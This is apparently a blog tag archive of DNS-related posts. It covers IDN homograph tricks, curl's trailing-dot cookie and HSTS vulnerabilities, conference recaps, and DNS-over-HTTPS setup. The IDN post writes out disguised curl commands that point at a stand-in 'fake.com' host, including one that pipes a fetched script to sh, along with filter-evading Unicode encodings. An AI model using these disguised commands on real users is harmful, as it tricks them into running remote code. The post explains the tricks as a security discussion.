Tag Archives: dns

IDN is crazy

IDN, International Domain Names, is the concept that lets us register and use international characters in domain names, and by international we of course mean characters outside of the ASCII range.

Recently I have fought some battles against IDN and IDN decoding so I felt this urge to write a lot of words about it to help me in my healing process and maybe mend my scars a little. I am not sure it worked but at least I feel a little better now.

(If WordPress had a more sensible Unicode handling, this post would have nicer looking examples. I can enter Unicode fine, but if I save the post as a draft and come back to it later, most of the Unicodes are replaced by question marks! Because of this, the examples below are not all using the exact Unicode symbols the text speaks of.)

Punycode

IDN works by having apps convert the Unicode name into the ASCII based punycode version under the hood, and then use that with DNS etc. The puny code version of “räksmörgås.se” becomes “xn--rksmrgs-5wao1o.se“. A pretty clever solution really.

The good side

Using this method, we can use URLs like https://räksmörgås.se or even ones written entirely in Arabic, Chinese or Cyrillic etc in compliant applications like browsers and curl. Even the TLD can be “international”. The whole Unicode range is at our disposal and this is certainly a powerful tool and allows a lot of non-Latin based languages to actually be used for domain names.

Gone are the days when everything needed to be converted to Latin.

There are many ugly sides

Already from the start of the IDN adventure, people realized that Unicode contains a lot of symbols that are identical or almost identical to other symbols, so you can make up the perfect fake sites that provide no or very little visual distinction from the one you try to look like.

Homographs

I remember early demonstrations using paypal.com vs paypal.com, where the second name was actually using a completely different letter somewhere. Perhaps for example the ‘l’ used the Cyrillic Capital Letter Iota (U+A646) – which in most fonts is next to indistinguishable from the lower case ASCII letter L. This is commonly referred to as an IDN Homograph attack. They look identical, but are different.

This concept of replacing one or more characters by identical glyphs is mitigated in part in browsers, which switch to showing the punycode version in the URL bar instead of the Unicode version – when they think it is mandated. Domain names are not allowed to mix scripts for different languages, and if they do the IDNs names are displayed using their punycode.

This of course does not prevent someone from promoting a command line curl use that uses it, and maybe encourage use of it:

curl https://example.com/api/

If you would copy and paste such an example, you would find that curl cannot resolve xn--exampe-7r6v.com! Or if you use the same symbol in the curl domain name:

$ curl https://curl.se
curl: (6) Could not resolve host: xn--cur-ju2l.se

Heterograph?

Similar to the previous confusion, there’s another version of the homograph attack and this is one that stayed under the radar for me for a long time. I suppose we can call it a Heterograph attack, as it makes names look different when they are in fact the same.

The IDN system is also “helpfully” replacing some similarly looking glyphs with their ASCII counterparts. I use quotes around helpfully, because I truly believe that this generally causes more harm and pain in users’ lives than it actually does good.

A user can provide a name using an IDN version of one or more characters within the name, and that name will then get translated into a regular non-IDN name and then get used normally from then on. I realize this may sound complicated, but it really is not.

Let me show you a somewhat crazy example (shown as an image to prevent WordPress from interfering). You want to use a curl command line to get the contents of the URL https://curl.se but since you are wild and crazy, you spice up things and replace every character in the domain name with a Unicode replacement:

If you would copy and paste this command line into your terminal, it works. Everyone can see that this domain name looks crazy, but it does not matter. It still works. It also works in browsers. A browser will however immediately show the translated version in the URL bar.

This method can be used for avoiding filters and has several times been used to find flaws in curl’s HSTS handling. Surely other tools can be tricked and fooled using variations of this as well.

This works because the characters used in the domain name are automatically converted to their ASCII counterparts by the IDN function. And since there is no IDN characters left after the conversion, it does not end up punycoded but instead it is plain old ASCII again. Those Unicode symbols simply translate into “curl.se”.

The example above also replaces the period before “se” with the Halfwidth Ideographic Full Stop (U+FF61).

Replacing the dot this way works as well. “Helpful”.

A large set to pick from

If we look at the letter ‘c’ alone, it has a huge number of variations in the Unicode set that all translate into ASCII ‘c’ by the IDN conversion. I found at least these fifteen variations that all convert to c:

  • Fullwidth Latin Small Letter C (U+FF43)
  • Modifier Letter Small C (U+1D9C)
  • Small Roman Numeral One Hundred (U+217D)
  • Mathematical Bold Small C (U+1D41C)
  • Mathematical Italic Small C (U+1D450)
  • Mathematical Bold Italic Small C (U+1D484)
  • Mathematical Script Small C (U+1D4B8)
  • Mathematical Fraktur Small C (U+1D520)
  • Mathematical Double-Struck Small C (U+1D554)
  • Mathematical Bold Fraktur Small C (U+1D588)
  • Mathematical Sans-Serif Small C (U+1D5BC)
  • Mathematical Sans-Serif Bold Small C (U+1D5F0)
  • Mathematical Sans-Serif Italic Small C (U+1D624)
  • Mathematical Sans-Serif Bold Italic Small C (U+1D658)
  • Mathematical Monospace Small C (U+1D68C)

The Unicode consortium even has this collection of “confusables” which also features a tool that lets you visualize a name done with various combinations of Unicode homographs. I entered curl, and here’s a subset of the alternatives it showed me:

Supposedly, all of those combinations can be used as IDN names and they will work.

Homographic slash

The Fraction Slash (U+2044) looks very much like an ASCII slash, but is not. Use it instead of a slash to make the URL look like host name with a slash, but then add your own domain name after it:

$ curl https://google.com/.curl.se
curl: (6) Could not resolve host: google.xn--com-qt0a.curl.se

If you paste that URL into a browser, it will switch to punycode mode, but still. The next example also shows as punycode when I try it in Firefox.

Homographic question mark

If you want an alternative to the slash-looking non-slash symbol, you can also trick a user with something that looks similar to a question mark. The Latin Capital Letter Glottal Stop (U+0241) for example is a symbol that looks confusingly similar to a question mark in many fonts:

$ curl https://google.com?.curl.se
curl: (6) Could not resolve host: google.xn--com-sqb.curl.se

In both the slash and these question mark examples, I could of course set up a host that would have some clever content.

Homographic fragment

The Viewdata Square (U+2317) can be used to mimic a hash symbol.

$ curl https://trusted.com#.fake.com
curl: (6) Could not resolve host: trusted.xn--com-d62a.fake.com

Percent encode the thing

It can look even weirder if you combine the above tricks and then percent-encode the UTF-8 bytes. This thing below still ends up “https://curl.se”:

$ curl "https://%e2%84%82%e1%b5%a4%e2%93%87%e2%84%92%e3%80%82%f0%9d%90%92%f0%9f%84%b4"

That URL of course also works fine to paste into a browser’s URL bar.

Zero Width space

Unicode offers this fun “symbol” that is literally nothing. It is a zero width space (U+200B). The IDN handling also recognizes this and will remove any such in the process. This means that you can add one or more zero width spaces to any domain in a URL and the domain will still work and end up being the original one. The UTF-8 sequence for this is %e2%80%8b when expressed percent encoded.

Instead of using curl.se you can thus use cu%e2%80%8brl.se. Or even cu%e2%80%8brl.s%e2%80%8be!

$ curl https://cu%e2%80%8brl.s%e2%80%8be

Tricking a curl user

curl users will not get the punycode version shown in a URL bar so we might be easier to fool by these stunts. If the user doesn’t carefully check perhaps the verbose output, they might very well be fooled.

HTTPS does not save us either, because nothing prevents an impostor from creating this domain name and having a perfectly valid certificate for it.

A really sneaky command line to trick users to download something from a site fake site, while appearing to download from a known and trusted one can look like this:

$ curl https://trusted.com?.fake.com/file -O

… but since the question mark on the right side of ‘com’ is a Unicode symbol, and the curl tool supports IDN, it actually gets a page from “fake.com”, As owner of fake.com, we would only need to make sure that https://trusted.xn--com-qt0a.fake.com exists and works.

A real world attack could even have a redirect to the real trusted.com domain for 99% of the cases or maybe for all cases where the user agent or source IP are not the ones we are looking for.

The old pipe from curl to shell thing is of course also an effective trick. It looks like you get the script from trusted.com using HTTPS and everything:

$ curl https://trusted.com?.fake.com/script | sh

More

This blog post is not meant to be a conclusive list of all problems or possible IDN trickery you can play with. I hear for example that mixing right-to-left with left-to-right in the same domain name is another treasure trove of confusions ready for your further explorations.

Game on!

Mitigations

People have mentioned it as comments to this: all registrars may not allow you to register domains containing specific Unicode symbols. In the past we have however seen that some TLDs are more liberal. Also, what I mention above are mostly tricks you can do without registering a new domain.

ICANN presumably has rules against use of emojis etc when creating new TLDs.

Discuss

Hacker news.

A tale of a trailing dot

Trailing dots on host names in URLs is the gift that keeps on giving.

Let me take you through a dwindling story of how the dot is handled differently in different places through the stack of an Internet client. The evil trailing dot.

DNS

When a given host name is to be resolved to an IP address on a networked computer, there are dedicated functions to use. The host name example.com resolves to a number of IP addresses.

If you add a dot to the end of that host name, it does not change what is resolved. “example.com.” resolves to the same set of addresses as “example.com” does. (But putting two dots at the end will make it fail.)

The reason why it works like this is based on how DNS is built up with different “labels” (that when written in text are separated with dots) and then having a trailing dot is just an empty final label, just as with no dot. So, in the DNS protocol there are no trailing dots so to speak. When trying two dots at the end, it makes a zero-length label between them and that is not allowed.

People accustomed to fiddle with DNS are used to ending Fully Qualified Domain Names (FQDN) with a trailing dot.

Resolving names

In addition to the name actually being resolved (sent to a DNS resolver), native resolver functions usually puts a meaning and a semantic difference between resolving “hello” and “hello.” (with or without the trailing dot). The trailing dot then means the name is to be used actually exactly only like that, it is specified in full, while the name without a trailing dot can be tried with a domain name appended to it. Or even a list of domain names, until one resolves. This makes people want to use a trailing dot at times, to avoid that domain test.

HTTP names

HTTP clients that want to work with a given URL needs to extract the name part from the URL and use that name to:

  1. resolve the host name to a list of IP addresses to connect to
  2. pass that name in the Host: or :authority: request headers, so that the HTTP server knows which specific server the clients speaks to – as it may run multiple servers on the same IP address

The HTTP spec says the name in the Host header should be used verbatim from the URL; the trailing dot should be included if it was present in the URL. This allows a server to host different content for “example.com” and “example.com.”, even if many servers will by default treat them as the same. Some hosts will just redirect the dot version to the non-dot. Some hosts will return error.

The HTTP client certainly connects to the same set of addresses for both.

For a lot of HTTP traffic, having the trailing dot there or not makes no difference. But they can be made to make a difference. And boy, they can certainly make a difference internally…

Cookies

Cookies are passed back and forth over HTTP using dedicated request and response headers. When a server wants to pass a cookie to the client, it can specify for which particular domain it is valid for and the client will send back cookies to the server only when there is a match of the domain it speaks to and for which domain cookies are set to etc.

The cookie spec RFC 6265 section 5.1.2 defines the host name in a way that makes it ignore trailing dots. Cookies set for a domain with a dot are valid for the same domain without one and vice versa.

SNI

When speaking to a HTTPS server, a client passes on the name of the remote server during the TLS handshake, in the SNI (Server Name Indication) field, so that the server knows which instance the client wants to speak to. What about the trailing dot you think?

The hostname is represented as a byte string using ASCII encoding without a trailing dot.

Meaning, that a HTTPS server cannot – in the TLS layer – make a distinction between a server for “example.com.” and “example.com”. Different hosts for HTTP, the same host for HTTPS.

curl’s dotted past

In the curl project, we – as everyone else – have struggled with the trailing dot over time.

As-is

We started out being mostly oblivious about the effects of the trailing dot and most of the code just treated it as part of the host name and it would be in the host name everywhere. Until one day someone pointed out that the SNI field does not approve of it. We fixed that.

Strip it

In 2014, curl started to always just cut off trailing dots internally if one was provided in the URL. The dot rarely makes a difference, it made the host name work fine with SNI and for HTTPS it is practically difficult to make a difference between them.

Keep it

In 2022, someone found a web site that actually requires a trailing dot in the Host: header to respond correctly and reported it to the curl project.

Sigh. We back-pedaled on the eight years old decision and decided to internally keep the dot in the name, but strip it for the purpose of the SNI field. This seems to be how the browsers are doing it. We released curl 7.82.0 with this change. That site that needed the trailing dot kept in the Host: header could now be retrieved with curl. Yay.

As a bonus curl also lowercases the SNI name field now, because that is what the browsers do even if the spec says the field is supposed to be used case insensitively. That habit has made sure there are servers on the Internet that won’t work properly if the SNI name is not lowercase…

In your face

That “back-peddle” for 7.82.0 when we brought back the dot into the host name field, turned out to be incomplete, but it was not totally obvious nor immediately apparent.

When we brought back the trailing dot into the name field, we accidentally broke several internal name checks.

The checks broke in the cookie handling of domains even though cookies, as mentioned above, are supposed to not care about trailing dots.

To understand this, we have to back up a little bit and talk about how cookies and cookie domains work.

Public Suffixes

Cookies are strange beasts and because the server can tell the client for which domain the cookie applies to, a client needs to check so that the server does not try to set the cookies too broadly or for other domains. It does not stop there, but there is also the concept of something called “Public Suffix List” (PSL), which are known domains for which setting a cookie is not accepted. (This list is also used for limiting other things in browsers but they are out of scope here.) One widely known such domain to mention as an example is “co.uk”. A server should not be allowed to set a cookie for “co.uk” as then it would basically be sent back for every web site that exist in the UK.

The PSL is a maintained list with a huge number of domains in it. To manage those and to make sure tools like curl can check for them in a convenient way, a dedicated library was made for this several years ago: libpsl. curl has optionally used this since 2015.

I said optional

That public suffix list is huge, which is a primary reason why many users still opt to build curl without support for it. This means that curl needs to provide backup functionality for the builds where libpsl is not present. Typically in a lot of embedded systems.

Without knowledge of the PSL curl will not reject cookies for “co.uk” but it should reject cookies for “.uk” or “.com” as even without PSL knowledge it still knows that setting cookies for top-level domains is not okay.

How did the curl check used without PSL verify if the given domain is a TLD only?

It checked – if there is a dot present in the name, then it is not a TLD.

CVE-2022-27779

Axel Chong figured out that for a curl build without PSL knowledge, the server could set a cookie for a TLD if you just made sure to end the name with a dot.

With the 7.82.0 change in place, where curl keeps the trailing dot for the host name, combined with that cookie set for TLD domain with a trailing dot, they have matching tail ends. This means that curl would send cookies to servers that match the criteria. The broken TLD check was benign all those years until we let the trailing dot in. This is security vulnerability CVE-2022-27779.

CVE-2022-30115

It did not stop there. Axel did not stop there. Since curl now keeps the trailing dot in the name and did not do it before, there was a second important string comparison that broke in unexpected ways that Axel figured out and reported. A second vulnerability introduced by the same change.

HSTS is the concept that allows curl to store a “cache” of host names and keep it around, so that if you want to do a subsequent transfer to one of those host names again before they expire, curl will go directly to HTTPS even if HTTP is used in the URL. As a way to avoid the clear-text insecure redirect step some URLs use.

The new treatment of trailing dots, that basically allows users to provide the same host name in two different ways and yet resolve to the exact same addresses exposed that the HSTS code did take care of (ignored) the trailing dot properly. If you let curl store HSTS info for the host name without a trailing dot, you can then later bypass the HSTS by using the same host name with a trailing dot. Or vice versa. This is security vulnerability CVE-2022-30115.

alt-svc

The code for alt-svc also needed adjustment for the dot, but fortunately that was “just” a bug and had not security impact.

All these three separate areas in which trailing dots caused problems have been fixed in curl 7.83.1 and all of them are now tested and verified with an extended set of tests to make sure they keep handle the dots correctly.

Someone called it a dot release.

Is this the end of dot problems?

I don’t know but it seems unlikely. The trailing dots have kept on haunting us since a long time by now so I would say the chances are big that there are both some more flaws lingering and some future changes pending. That then can make the cycle take another loop or two.

I suppose we will find out. Stay tuned!

The HTTP Workshop 2019 begins

The forth season of my favorite HTTP series is back! The HTTP Workshop skipped over last year but is back now with a three day event organized by the very best: Mark, Martin, Julian and Roy. This time we’re in Amsterdam, the Netherlands.

35 persons from all over the world walked in the room and sat down around the O-shaped table setup. Lots of known faces and representatives from a large variety of HTTP implementations, client-side or server-side – but happily enough also a few new friends that attend their first HTTP Workshop here. The companies with the most employees present in the room include Apple, Facebook, Mozilla, Fastly, Cloudflare and Google – having three or four each in the room.

Patrick Mcmanus started off the morning with his presentation on HTTP conventional wisdoms trying to identify what have turned out as successes or not in HTTP land in recent times. It triggered a few discussions on the specific points and how to judge them. I believe the general consensus ended up mostly agreeing with the slides. The topic of unshipping HTTP/0.9 support came up but is said to not be possible due to its existing use. As a bonus, Anne van Kesteren posted a new bug on Firefox to remove it.

Mark Nottingham continued and did a brief presentation about the recent discussions in HTTPbis sessions during the IETF meetings in Prague last week.

Martin Thomson did a presentation about HTTP authority. Basically how a client decides where and who to ask for a resource identified by a URI. This triggered an intense discussion that involved a lot of UI and UX but also trust, certificates and subjectAltNames, DNS and various secure DNS efforts, connection coalescing, DNSSEC, DANE, ORIGIN frame, alternative certificates and more.

Mike West explained for the room about the concept for Signed Exchanges that Chrome now supports. A way for server A to host contents for server B and yet have the client able to verify that it is fine.

Tommy Pauly then talked to his slides with the title of Website Fingerprinting. He covered different areas of a browser’s activities that are current possible to monitor and use for fingerprinting and what counter-measures that exist to work against furthering that development. By looking at the full activity, including TCP flows and IP addresses even lots of our encrypted connections still allow for pretty accurate and extensive “Page Load Fingerprinting”. We need to be aware and the discussion went on discussing what can or should be done to help out.

The meeting is going on somewhere behind that red door.

Lucas Pardue discussed and showed how we can do TLS interception with Wireshark (since the release of version 3) of Firefox, Chrome or curl and in the end make sure that the resulting PCAP file can get the necessary key bundled in the same file. This is really convenient when you want to send that PCAP over to your protocol debugging friends.

Roberto Peon presented his new idea for “Generic overlay networks”, a suggested way for clients to get resources from one out of several alternatives. A neighboring idea to Signed Exchanges, but still different. There was an interested to further and deepen this discussion and Roberto ended up saying he’d at write up a draft for it.

Max Hils talked about Intercepting QUIC and how the ability to do this kind of thing is very useful in many situations. During development, for debugging and for checking what potentially bad stuff applications are actually doing on your own devices. Intercepting QUIC and HTTP/3 can thus also be valuable but at least for now presents some challenges. (Max also happened to mention that the project he works on, mitmproxy, has more stars on github than curl, but I’ll just let it slide…)

Poul-Henning Kamp showed us vtest – a tool and framework for testing HTTP implementations that both Varnish and HAproxy are now using. Massaged the right way, this could develop into a generic HTTP test/conformance tool that could be valuable for and appreciated by even more users going forward.

Asbjørn Ulsberg showed us several current frameworks that are doing GET, POST or SEARCH with request bodies and discussed how this works with caching and proposed that SEARCH should be defined as cacheable. The room mostly acknowledged the problem – that has been discussed before and that probably the time is ripe to finally do something about it. Lots of users are already doing similar things and cached POST contents is in use, just not defined generically. SEARCH is a already registered method but could get polished to work for this. It was also suggested that possibly POST could be modified to also allow for caching in an opt-in way and Mark volunteered to author a first draft elaborating how it could work.

Indonesian and Tibetan food for dinner rounded off a fully packed day.

Thanks Cory Benfield for sharing your notes from the day, helping me get the details straight!

Diversity

We’re a very homogeneous group of humans. Most of us are old white men, basically all clones and practically indistinguishable from each other. This is not diverse enough!

A big thank you to the HTTP Workshop 2019 sponsors!


My 10th FOSDEM

I didn’t present anything during last year’s conference, so I submitted my DNS-over-HTTPS presentation proposal early on for this year’s FOSDEM. Someone suggested it was generic enough I should rather ask for main track instead of the DNS room, and so I did. Then time passed and in November 2018 “HTTP/3” was officially coined as a real term and then, after the Mozilla devroom’s deadline had been extended for a week I filed my second proposal. I might possibly even have been an hour or two after the deadline. I hoped at least one of them would be accepted.

Not only were both my proposed talks accepted, I was also approached and couldn’t decline the honor of participating in the DNS privacy panel. Ok, three slots in the same FOSDEM is a new record for me, but hey, surely that’s no problems for a grown-up..

HTTP/3

I of coursed hoped there would be interest in what I had to say.

I spent the time immediately before my talk with a coffee in the awesome newly opened cafeteria part to have a moment of calmness before I started. I then headed over to the U2.208 room maybe half an hour before the start time.

It was packed. Quite literally there were hundreds of persons waiting in the area outside the U2 rooms and there was this totally massive line of waiting visitors queuing to get into the Mozilla room once it would open.

The “Sorry, this room is FULL” sign is commonly seen on FOSDEM.

People don’t know who I am by my appearance so I certainly didn’t get any special treatment, waiting for my talk to start. I waited in line with the rest and when the time for my presentation started to get closer I just had to excuse myself, leave my friends behind and push through the crowd. I managed to get a “sorry, it’s full” told to me by a conference admin before one of the room organizers recognized me as the speaker of the next talk and I could walk by a very long line of humans that eventually would end up not being able to get in. The room could fit 170 souls, and every single seat was occupied when I started my presentation just a few minutes late.

This presentation could have filled a much larger room. Two years ago my HTTP/2 talk filled up the 300 seat room Mozilla had that year.

Video

Video from my HTTP/3 talk. Duration 1 hour.

The slides from my HTTP/3 presentation.

DNS over HTTPS

I tend to need a little “landing time” after having done a presentation to cool off an come back to normal senses and adrenaline levels again. I got myself a lunch, a beer and chatted with friends in the cafeteria (again). During this conversation, it struck me I had forgotten something in my coming presentation and I added a slide that I felt would improve it (the screenshot showing “about:networking#dns” output with DoH enabled). In what felt like no time, it was again to move. I walked over to Janson, the giant hall that fits 1,470 persons, which I entered a few minutes ahead of my scheduled time and began setting up my machine.

I started off with a little technical glitch because the projector was correctly detected and setup as a second screen on my laptop but it would detect and use a too high resolution for it, but after just a short moment of panic I lowered the resolution on that screen manually and the image appeared fine. Phew! With a slightly raised pulse, I witnessed the room fill up. Almost full. I estimate over 90% of the seats were occupied.

The DNS over HTTPS talk seen from far back. Photo by Steve Holme.

This was a brand new talk with all new material and I performed it for the largest audience I think I’ve ever talked in front of.

Video

Video of my DNS over HTTPS presentation. Duration 50 minutes.

To no surprise, my talk triggered questions and objections. I spent a while in the corridor behind Janson afterward, discussing DoH details, the future of secure DNS and other subtle points of the different protocols involved. In the end I think I manged pretty good, and I had expected more arguments and more tough questions. This is after all the single topic I’ve had more abuse and name-calling for than anything else I’ve ever worked on before in my 20+ years in Internet protocols. (After all, I now often refer to myself and what I do as webshit.)

My DNS over HTTPS slides.

DNS Privacy panel

I never really intended to involve myself in DNS privacy discussions, but due to the constant misunderstandings and mischaracterizations (both on purpose and by ignorance) sometimes spread about DoH, I’ve felt a need to stand up for it a few times. I think that was a contributing factor to me getting invited to be part of the DNS privacy panel that the organizers of the DNS devroom setup.

There are several problems and challenges left to solve before we’re in a world with correctly and mostly secure DNS. DoH is one attempt to raise the bar. I was content to had the opportunity to really spell out my view of things before the DNS privacy panel.

While sitting next to these giants from the DNS world, Stéphane Bortzmeyer, Bert Hubert and me discussed DoT, DoH, DNS centralization, user choice, quad-dns-hosters and more. The discussion didn’t get very heated but instead I think it showed that we’re all largely in agreement that we need more secure DNS and that there are obstacles in the way forward that we need to work further on to overcome. Moderator Jan-Piet Mens did an excellent job I think, handing over the word, juggling the questions and taking in questions from the audience.

Video

Video from the DNS Privacy panel. Duration 30 minutes.

Ten years, ten slots

Appearing in three scheduled slots during the same FOSDEM was a bit much, and it effectively made me not attend many other talks. They were all great fun to do though, and I appreciate people giving me the chance to share my knowledge and views to the world. As usually very nicely organized and handled. The videos of each presentation are linked to above.

I met many people, old and new friends. I handed out a lot of curl stickers and I enjoyed talking to people about my recently announced new job at wolfSSL.

After ten consecutive annual visits to FOSDEM, I have appeared in ten program slots!

I fully intend to go back to FOSDEM again next year. For all the friends, the waffles, the chats, the beers, the presentations and then for the waffles again. Maybe I will even present something…

DNS-over-HTTPS is RFC 8484

The protocol we fondly know as DoH, DNS-over-HTTPS, is now  officially RFC 8484 with the official title “DNS Queries over HTTPS (DoH)”. It documents the protocol that is already in production and used by several client-side implementations, including Firefox, Chrome and curl. Put simply, DoH sends a regular RFC 1035 DNS packet over HTTPS instead of over plain UDP.

I’m happy to have contributed my little bits to this standard effort and I’m credited in the Acknowledgements section. I’ve also implemented DoH client-side several times now.

Firefox has done studies and tests in cooperation with a CDN provider (which has sometimes made people conflate Firefox’s DoH support with those studies and that operator). These studies have shown and proven that DoH is a working way for many users to do secure name resolves at a reasonable penalty cost. At least when using a fallback to the native resolver for the tricky situations. In general DoH resolves are slower than the native ones but in the tail end, the absolutely slowest name resolves got a lot better with the DoH option.

To me, DoH is partly necessary because the “DNS world” has failed to ship and deploy secure and safe name lookups to the masses and this is the one way applications “one layer up” can still secure our users.

DoH in curl

DNS-over-HTTPS (DoH) is being designed (it is not an RFC quite yet but very soon!) to allow internet clients to get increased privacy and security for their name resolves. I’ve previously explained the DNS-over-HTTPS functionality within Firefox that ships in Firefox 62 and I did a presentation about DoH and its future in curl at curl up 2018.

We are now introducing DoH support in curl. I hope this will not only allow users to start getting better privacy and security for their curl based internet transfers, but ideally this will also provide an additional debugging tool for DoH in other clients and servers.

Let’s take a look at how we plan to let applications enable this when using libcurl and how libcurl has to work with this internally to glue things together.

How do I make my libcurl transfer use DoH?

There’s a primary new option added, which is the “DoH URL”. An application sets the CURLOPT_DOH_URL for a transfer, and then libcurl will use that service for resolving host names. Easy peasy. There should be nothing else in the transfer that changes or appears differently. It’ll just resolve the host names over DoH instead of using the default resolver!

What about bootstrap, how does libcurl find the DoH server’s host name?

Since the DoH URL itself typically is given using a host name, that first host name will be resolved using the normal resolver – or if you so desire, you can provide the IP address for that host name with the CURLOPT_RESOLVE option just like you can for any host name.

If done using the resolver, the resolved address will then be kept in libcurl’s DNS cache for a short while and the DoH connection will be kept in the regular connection pool with the other connections, making subsequent DoH resolves on the same handle much faster.

How do I use this from the command line?

Tell curl which DoH URL to use with the new –doh-url command line option:

$ curl --doh-url https://dns-server.example.com https://www.example.com

How do I make my libcurl code use this?

curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL,
                 "https://curl.haxx.se/");
curl_easy_setopt(curl, CURLOPT_DOH_URL,
                 "https://doh.example.com/");
res = curl_easy_perform(curl);

Internals

Internally, libcurl itself creates two new easy handles that it adds to the existing multi handles and they are then performing two HTTP requests while the original transfer sits in the “waiting for name resolve” state. Once the DoH requests are completed, the original transfer’s state can progress and continue on.

libcurl handles parallel transfers perfectly well already and by leveraging the already existing support for this, it was easy to add this new functionality and still work non-blocking and even event-based correctly depending on what libcurl API that is being used.

We had to add a new little special thing that makes libcurl handle the end of a transfer in a new way since there are now easy handles that are created and added to the multi handle entirely without the user’s knowledge, so the code also needs to remove and delete those handles when they’re done serving their purposes.

Was this hard to add to a 20 year old code base?

Actually, no. It was surprisingly easy, but then I’ve also worked on a few different client-side DoH implementations already so I had gotten myself a clear view of how I wanted the functionality to work plus the fact that I’m very familiar with the libcurl internals.

Plus, everything inside libcurl is already using non-blocking code and the multi interface paradigms so the foundation for adding parallel transfers like this was already in place.

The entire DoH patch for curl, including documentation and test cases, was a mere 1500 lines.

Ship?

This is merged into the master branch in git and is planned to ship as part of the next release: 7.62.0 at the end of October 2018.

How to DoH-only with Firefox

Firefox supports DNS-over-HTTPS (aka DoH) since version 62.

You can instruct your Firefox to only use DoH and never fall-back and try the native resolver; the mode we call trr-only. Without any other ability to resolve host names, this is a little tricky so this guide is here to help you. (This situation might improve in the future.)

In trr-only mode, nobody on your local network nor on your ISP can snoop on your name resolves. The SNI part of HTTPS connections are still clear text though, so eavesdroppers on path can still figure out which hosts you connect to.

There’s a name in my URI

A primary problem for trr-only is that we usually want to use a host name in the URI for the DoH server (we typically need it to be a name so that we can verify the server’s certificate against it), but we can’t resolve that host name until DoH is setup to work. A catch-22.

There are currently two ways around this problem:

  1. Tell Firefox the IP address of the name that you use in the URI. We call it the “bootstrapAddress”. See further below.
  2. Use a DoH server that is provided on an IP-number URI. This is rather unusual. There’s for example one at 1.1.1.1.

Setup and use trr-only

There are three prefs to focus on (they’re all explained elsewhere):

network.trr.mode – set this to the number 3.

network.trr.uri – set this to the URI of the DoH server you want to use. This should be a server you trust and want to hand over your name resolves to. The Cloudflare one we’ve previously used in DoH tests with Firefox is https://mozilla.cloudflare-dns.com/dns-query.

network.trr.bootstrapAddress– when you use a host name in the URI for the network.trr.uri pref you must set this pref to an IP address that host name resolves to for you. It is important that you pick an IP address that the name you use actually would resolve to.

Example

Let’s pretend you want to go full trr-only and use a DoH server at https://example.com/dns. (it’s a pretend URI, it doesn’t work).

Figure out the bootstrapAddress with dig. Resolve the host name from the URI:

$ dig +short example.com
93.184.216.34

or if you prefer to be classy and use the IPv6 address (only do this if IPv6 is actually working for you)

$ dig -t AAAA +short example.com
2606:2800:220:1:248:1893:25c8:1946

dig might give you a whole list of addresses back, and then you can pick any one of them in the list. Only pick one address though.

Go to “about:config” and paste the copied IP address into the value field for network.trr.bootstrapAddress. Now TRR / DoH should be able to get going. When you can see web pages, you know it works!

DoH-only means only DoH

If you happen to start Firefox behind a captive portal while in trr-only mode, the connections to the DoH server will fail and no name resolves can be performed.

In those situations, normally Firefox’s captive portable detector would trigger and show you the login page etc, but when no names can be resolved and the captive portal can’t respond with a fake response to the name lookup and redirect you to the login, it won’t get anywhere. It gets stuck. And currently, there’s no good visual indication anywhere that this is what happens.

You simply can’t get out of a captive portal with trr-only. You probably then temporarily switch mode, login to the portal and switch the mode to 3 again.

If you “unlock” the captive portal with another browser/system, Firefox’s regular retries while in trr-only will soon detect that and things should start working again.

Inside Firefox’s DOH engine

DNS over HTTPS (DOH) is a feature where a client shortcuts the standard native resolver and instead asks a dedicated DOH server to resolve names.

Compared to regular unprotected DNS lookups done over UDP or TCP, DOH increases privacy, security and sometimes even performance. It also makes it easy to use a name server of your choice for a particular application instead of the one configured globally (often by someone else) for your entire system.

DNS over HTTPS is quite simply the same regular DNS packets (RFC 1035 style) normally sent in clear-text over UDP or TCP but instead sent with HTTPS requests. Your typical DNS server provider (like your ISP) might not support this yet.

To get the finer details of this concept, check out Lin Clark’s awesome cartoon explanation of DNS and DOH.

This new Firefox feature is planned to get ready and ship in Firefox release 62 (early September 2018). You can test it already now in Firefox Nightly by setting preferences manually as described below.

This article will explain some of the tweaks, inner details and the finer workings of the Firefox TRR implementation (TRR == Trusted Recursive Resolver) that speaks DOH.

Preferences

All preferences (go to “about:config”) for this functionality are located under the “network.trr” prefix.

network.trr.mode – set which resolver mode you want.

0 – Off (default). use standard native resolving only (don’t use TRR at all)
1 – Race native against TRR. Do them both in parallel and go with the one that returns a result first.
2 – TRR first. Use TRR first, and only if the name resolve fails use the native resolver as a fallback.
3 – TRR only. Only use TRR. Never use the native (after the initial setup).
4 – Shadow mode. Runs the TRR resolves in parallel with the native for timing and measurements but uses only the native resolver results.
5 – Explicitly off. Also off, but selected off by choice and not default.

network.trr.uri – (default: none) set the URI for your DOH server. That’s the URL Firefox will issue its HTTP request to. It must be a HTTPS URL (non-HTTPS URIs will simply be ignored). If “useGET” is enabled, Firefox will append “?ct&dns=….” to the URI when it makes its HTTP requests. For the default POST requests, they will be issued to exactly the specified URI.

“mode” and “uri” are the only two prefs required to set to activate TRR. The rest of them listed below are for tweaking behavior.

We list some publicly known DOH servers here. If you prefer to, it is easy to setup and run your own.

network.trr.credentials – (default: none) set credentials that will be used in the HTTP requests to the DOH end-point. It is the right side content, the value, sent in the Authorization: request header. Handy if you for example want to run your own public server and yet limit who can use it.

network.trr.wait-for-portal – (default: true) this boolean tells Firefox to first wait for the captive portal detection to signal “okay” before TRR is used.

network.trr.allow-rfc1918 – (default: false) set this to true to allow RFC 1918 private addresses in TRR responses. When set false, any such response will be considered a wrong response that won’t be used.

network.trr.useGET – (default: false) When the browser issues a request to the DOH server to resolve host names, it can do that using POST or GET. By default Firefox will use POST, but by toggling this you can enforce GET to be used instead. The DOH spec says a server MUST support both methods.

network.trr.confirmationNS – (default: example.com) At startup, Firefox will first check an NS entry to verify that TRR works, before it gets enabled for real and used for name resolves. This preference sets which domain to check. The verification only checks for a positive answer, it doesn’t actually care what the response data says.

network.trr.bootstrapAddress – (default: none) by setting this field to the IP address of the host name used in “network.trr.uri”, you can bypass using the system native resolver for it. This avoids that initial (native) name resolve for the host name mentioned in the network.trr.uri pref.

network.trr.blacklist-duration – (default: 60) is the number of seconds a name will be kept in the TRR blacklist until it expires and can be tried again. The default duration is one minute. (Update: this has been cut down from previous longer defaults.)

network.trr.request-timeout – (default: 3000) is the number of milliseconds a request to and corresponding response from the DOH server is allowed to spend until considered failed and discarded.

